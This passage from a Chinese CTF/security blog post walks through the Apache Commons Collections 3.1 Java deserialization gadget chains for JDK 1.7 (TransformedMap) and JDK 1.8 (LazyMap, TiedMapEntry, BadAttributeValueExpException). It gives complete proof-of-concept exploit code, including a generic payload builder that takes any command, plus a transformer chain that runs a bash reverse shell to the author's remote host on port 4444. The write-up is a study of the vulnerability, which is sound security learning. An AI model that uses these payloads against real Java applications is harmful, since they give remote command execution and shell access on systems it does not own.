class="hljs-number">0</span>]&#125;<br>                ),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<br>                        <span class="hljs-string">&quot;exec&quot;</span>,<br>                        <span class="hljs-keyword">new</span> Class[]&#123;String.class&#125;,<br>                        <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;bash -i &gt;&amp; /dev/tcp/vps/4444 0&gt;&amp;1&quot;</span>&#125;<br>                )<br>                &#125;;<br>        Transformer transformerChain =<span class="hljs-keyword">new</span> ChainedTransformer(test);<br><br>        Map tempMap = <span class="hljs-keyword">new</span> HashMap&lt;String, Object&gt;();<br>        Map&lt;String, Object&gt; exMap = TransformedMap.decorate(tempMap, <span class="hljs-keyword">null</span>, transformerChain);<br>        exMap.put(<span class="hljs-string">&quot;1111&quot;</span>, <span class="hljs-string">&quot;2222&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>跟进到put函数时栈情况</p>
<p><img src="https://img-blog.csdnimg.cn/c831b5c2aa304e578922ba3cb01e23a1.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>初始化时<code>Map&lt;String, Object&gt; exMap = TransformedMap.decorate(tempMap, null, transformerChain);</code>这里<code>this.valueTransformer</code>不为空所以进入到<code>transform</code>函数        </p>
<p><img src="https://img-blog.csdnimg.cn/e71c8b9720f448ba8096f27e1d089a39.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>多级链多次调用反射</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211106223219346.png" srcset="/img/loading.gif" lazyload alt="image-20211106223219346"></p>
<p>最后一次循环得到<code>exec</code>函数，这里的反射调用需要自己多多理解和调试一下。</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211106223349029.png" srcset="/img/loading.gif" lazyload alt="image-20211106223349029"></p>
<p>第二次循环传入<code>Runtime.class</code></p>
<p><img src="https://img-blog.csdnimg.cn/f572db9ed1e54a94bcc7f9092108bab6.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/f0ef144ac0274754bdf3e836f3da6b60.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>跳出第二次循环后获取到<code>Runtime.getRumtime()</code>对象</p>
<p><img src="https://img-blog.csdnimg.cn/fd0d79fca5894c95be0a521a1c2a858c.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211108154318110.png" srcset="/img/loading.gif" lazyload alt="image-20211108154318110"></p>
<p>跳出后</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211108154342143.png" srcset="/img/loading.gif" lazyload alt="image-20211108154342143"></p>
<p>进入最后一次循环</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211108154438113.png" srcset="/img/loading.gif" lazyload alt="image-20211108154438113"></p>
<p>最终反弹到shell</p>
<p><img src="https://img-blog.csdnimg.cn/abb260c30635482bad208db339973ea6.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>整条链多调试和理解感觉还是很清晰和顺利的，这里网上似乎还有另一个方法。利用<code>Map.Entry</code>的<code>setValue</code>函数来触发漏洞，poc主函数如下</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">Transformer[] transformers = <span class="hljs-keyword">new</span> Transformer[] &#123;<br>        <span class="hljs-keyword">new</span> ConstantTransformer(Runtime.class),<br>        <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123;String.class, Class[].class &#125;, <span class="hljs-keyword">new</span> Object[] &#123;<span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">new</span> Class[<span class="hljs-number">0</span>] &#125;),<br>        <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123;Object.class, Object[].class &#125;, <span class="hljs-keyword">new</span> Object[] &#123;<span class="hljs-keyword">null</span>, <span class="hljs-keyword">new</span> Object[<span class="hljs-number">0</span>] &#125;),<br>        <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123;String.class &#125;, <span class="hljs-keyword">new</span> Object[] &#123;<span class="hljs-string">&quot;calc.exe&quot;</span>&#125;)<br>&#125;;<br><br><span class="hljs-comment">//将transformers数组存入ChaniedTransformer这个继承类</span><br>Transformer transformerChain = <span class="hljs-keyword">new</span> ChainedTransformer(transformers);<br><br><span class="hljs-comment">//创建Map并绑定transformerChina</span><br>Map innerMap = <span class="hljs-keyword">new</span> HashMap();<br>innerMap.put(<span class="hljs-string">&quot;value&quot;</span>, <span class="hljs-string">&quot;value&quot;</span>);<br><span class="hljs-comment">//给予map数据转化链</span><br>Map outerMap = TransformedMap.decorate(innerMap, <span class="hljs-keyword">null</span>, transformerChain);<br><span class="hljs-comment">//触发漏洞</span><br>Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();<br><span class="hljs-comment">//outerMap后一串东西，其实就是获取这个map的第一个键值对（value,value）；然后转化成Map.Entry形式，这是map的键值对数据格式</span><br>onlyElement.setValue(<span class="hljs-string">&quot;foobar&quot;</span>);<br></code></pre></div></td></tr></table></figure>

<p>关键在于AbstracInputCheckedMapDecorator.class类中的<code>setValue</code>会进入到<code>TransformedMap</code>中的<code>checkSetValue</code>,后面大致就一样了。</p>
<p><img src="https://img-blog.csdnimg.cn/3a829cbc792b48b682e508fccad5cc45.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211106231618609.png" srcset="/img/loading.gif" lazyload alt="image-20211106231618609"></p>
<p>我们可以这里有经典的反射机制调用，在细节分析前我们先整理一下调用栈。</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">Map.Entry 类型setValue(<span class="hljs-string">&quot;foobar&quot;</span>)<br>=&gt; AbstracInputCheckedMapDecorator.setValue()<br>=&gt; TransformedMap.checkSetValue()<br>=&gt; ChainedTransformer.transform(Object object)<br>    根据数组，先进入 =&gt; ConstantTransformer.transform(Object input)<br>    再进入 =&gt; InvokerTransformer.transform(Object input)<br></code></pre></div></td></tr></table></figure>

<p>获取exec的反射调用流程为</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">Class.forName(<span class="hljs-string">&quot;java.lang.Runtime&quot;</span>)<br>.getMethod(<span class="hljs-string">&quot;exec&quot;</span>, String.class)<br>.invoke(<br>Class.forName(<span class="hljs-string">&quot;java.lang.Runtime&quot;</span>).getMethod(<span class="hljs-string">&quot;getRuntime&quot;</span>).invoke(Class.forName(<span class="hljs-string">&quot;java.lang.Runtime&quot;</span>))<span class="hljs-comment">//此处在获取实例</span><br>,<br><span class="hljs-string">&quot;calc.exe&quot;</span><br>)<br></code></pre></div></td></tr></table></figure>

<p>但是到这里都还只是停留在本地测试出了命令执行，要想在 Java 应用反序列化的过程中触发该过程还需要找到一个类，它能够在反序列化调用 readObject() 的时候调用 TransformedMap 内置类 MapEntry 中的 setValue() 函数，这样才能构成一条完整的 Gadget 调用链。恰好在 <code>sun.reflect.annotation.AnnotationInvocationHandler</code> 类具有 Map 类型的参数，并且在<code> readObject()</code> 方法中触发了上面所提到的所有条件，其源码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">readObject</span><span class="hljs-params">(java.io.ObjectInputStream s)</span> </span>&#123;<br>        ...省略...<br>        <span class="hljs-keyword">for</span> (Map.Entry&lt;String, Object&gt; memberValue : memberValues.entrySet()) &#123;<br>            String name = memberValue.getKey();<br>            Class&lt;?&gt; memberType = memberTypes.get(name);<br>            <span class="hljs-keyword">if</span> (memberType != <span class="hljs-keyword">null</span>) &#123;  <span class="hljs-comment">// i.e. member still exists</span><br>                Object value = memberValue.getValue();<br>                <span class="hljs-keyword">if</span> (!(memberType.isInstance(value) || value <span class="hljs-keyword">instanceof</span> ExceptionProxy)) &#123;<br>                    memberValue.setValue(<span class="hljs-keyword">new</span> AnnotationTypeMismatchExceptionProxy(value.getClass() + <span class="hljs-string">&quot;[&quot;</span> + value + <span class="hljs-string">&quot;]&quot;</span>).setMember(annotationType.members().get(name)));<br>                &#125;<br>            &#125;<br>        &#125;<br>    &#125;<br></code></pre></div></td></tr></table></figure>

<p>关键在于</p>
<p><code>memberValue.setValue(new AnnotationTypeMismatchExceptionProxy(value.getClass() + &quot;[&quot; + value + &quot;]&quot;).setMember(annotationType.members().get(name)));</code>调用了setValue函数，但是这是jdk1.7的版本，在jdk1.8中便不适用</p>
<p>也可以看看jdk1.8版本</p>
<p><img src="https://img-blog.csdnimg.cn/855de5736d904193835ae8bb04354f86.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h4 id="JDK1-8–LazyMap利用链"><a href="#JDK1-8–LazyMap利用链" class="headerlink" title="JDK1.8–LazyMap利用链"></a>JDK1.8–LazyMap利用链</h4><p>对于JDK 1.8来说，<code>AnnotationInvocationHandler</code>类中关键的触发点，setvalue发生了改变。所以我们需要寻找新的类重写readObject来实现调用，sda</p>
<h5 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a>调用链</h5><figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">反序列化BadAttributeValueExpException<br>-&gt;BadAttributeValueExpException.readObject()<br>-&gt;TideMapEntry.toString()<br>-&gt;TideMapEntry.getValue()<br>-&gt;LazyMap.get()<br>-&gt;ChainedTransformer.transform()<br></code></pre></div></td></tr></table></figure>

<p>最后一个环节肯定还是要调用到<code>ChainedTransformer.transform()</code>这里，所以我们直接先看<code>LazyMap</code></p>
<p><img src="https://img-blog.csdnimg.cn/a5563b5b7fba4cbeaec95a5a3e34ba0c.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/26d3aec379c24bde84c503834bc0db8e.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>要调用到get函数就找到了<code>TiedMapEntry</code>类</p>
<p><img src="https://img-blog.csdnimg.cn/6ff9788c84014b709c714bae54d1a824.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>存在tostring</p>
<p><img src="https://img-blog.csdnimg.cn/8c8bd61ba9ff47ecbf930a5f18e6d1ea.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>跟进可以发现可利用的地方</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211108171802668.png" srcset="/img/loading.gif" lazyload alt="image-20211108171802668"></p>
<p>最后需要一个类可以在反序列化重写readObject()时可以自动调用toString方法。完整的利用链就可以形成，这里找到了<code>BadAttributeValueExpException</code>类</p>
<p><img src="https://img-blog.csdnimg.cn/c971cf477da244b485c05947f40c17c7.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>调试过jdk1.7这个其实也差不多了，没有那么难理解了，附上exp</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">package</span> CC3_1.serialize;<br><br><span class="hljs-keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.LazyMap;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.*;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.TransformedMap;<br><br><span class="hljs-keyword">import</span> javax.management.BadAttributeValueExpException;<br><span class="hljs-keyword">import</span> java.io.ByteArrayInputStream;<br><span class="hljs-keyword">import</span> java.io.ByteArrayOutputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Map;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">commons_collections_3_1_jdk1_8</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> BadAttributeValueExpException <span class="hljs-title">getObject</span><span class="hljs-params">(<span class="hljs-keyword">final</span> String command)</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;<br>        <span class="hljs-keyword">final</span> String[] execArgs = <span class="hljs-keyword">new</span> String[] &#123; command &#125;;<br>        <span class="hljs-comment">// inert chain for setup</span><br>        <span class="hljs-keyword">final</span> Transformer[] transformers = <span class="hljs-keyword">new</span> Transformer[] &#123;<br>                <span class="hljs-keyword">new</span> ConstantTransformer(Runtime.class),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123;<br>                        String.class, Class[].class &#125;, <span class="hljs-keyword">new</span> Object[] &#123;<br>                        <span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">new</span> Class[<span class="hljs-number">0</span>] &#125;),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123;<br>                        Object.class, Object[].class &#125;, <span class="hljs-keyword">new</span> Object[] &#123;<br>                        <span class="hljs-keyword">null</span>, <span class="hljs-keyword">new</span> Object[<span class="hljs-number">0</span>]&#125;),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;exec&quot;</span>,<br>                        <span class="hljs-keyword">new</span> Class[] &#123; String.class &#125;, execArgs),<br>                <span class="hljs-keyword">new</span> ConstantTransformer(<span class="hljs-number">1</span>)&#125;;<br>        Transformer transformerChain = <span class="hljs-keyword">new</span> ChainedTransformer(transformers);<br>        <span class="hljs-keyword">final</span> Map innerMap = <span class="hljs-keyword">new</span> HashMap();<br><br>        <span class="hljs-keyword">final</span> Map lazyMap = LazyMap.decorate(innerMap, transformerChain);<br><br>        TiedMapEntry entry = <span class="hljs-keyword">new</span> TiedMapEntry(lazyMap, <span class="hljs-string">&quot;KKfine&quot;</span>);<br><br>        BadAttributeValueExpException val = <span class="hljs-keyword">new</span> BadAttributeValueExpException(<span class="hljs-keyword">null</span>);<br>        Field valfield = val.getClass().getDeclaredField(<span class="hljs-string">&quot;val&quot;</span>);<br>        valfield.setAccessible(<span class="hljs-keyword">true</span>);<br>        valfield.set(val, entry);<br><br>        <span class="hljs-keyword">return</span> val;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;<br><br>        BadAttributeValueExpException calc = getObject(<span class="hljs-string">&quot;calc&quot;</span>);<br><br>        ByteArrayOutputStream byteArrayOutputStream = <span class="hljs-keyword">new</span> ByteArrayOutputStream();<span class="hljs-comment">//用于存放person对象序列化byte数组的输出流</span><br><br>        ObjectOutputStream objectOutputStream = <span class="hljs-keyword">new</span> ObjectOutputStream(byteArrayOutputStream);<br>        objectOutputStream.writeObject(calc);<span class="hljs-comment">//序列化对象</span><br>        objectOutputStream.flush();<br>        objectOutputStream.close();<br><br>        <span class="hljs-keyword">byte</span>[] bytes = byteArrayOutputStream.toByteArray(); <span class="hljs-comment">//读取序列化后的对象byte数组</span><br><br>        ByteArrayInputStream byteArrayInputStream = <span class="hljs-keyword">new</span> ByteArrayInputStream(bytes);<span class="hljs-comment">//存放byte数组的输入流</span><br><br>        ObjectInputStream objectInputStream = <span class="hljs-keyword">new</span> ObjectInputStream(byteArrayInputStream);<br>        Object o = objectInputStream.readObject(); <span class="hljs-comment">//将byte数组输入流反序列化</span><br><br><br>    &#125;<br>&#125;<br></code></pre></div></td></tr></table></figure>







            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/ctf/">ctf</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/11/06/2021-11-java%E5%81%9A%E9%A2%98(1)/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">java做题1</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/11/04/2021-11-%E4%B8%9C%E5%8D%8E%E6%9D%AF/">
                        <span class="hidden-mobile">东华杯</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>
<!-- 代码语言 -->
<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>
<!-- 代码块复制 -->
<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>
<script type="text/javascript" src="/libs/codeBlock/clipboard.min.js"></script>
<!-- 代码块收缩 -->
<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script> 
<!-- 代码块折行 -->
<style type="text/css">code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }</style>

    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        京ICP证123456号
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=12345678"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>京公网安备12345678号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
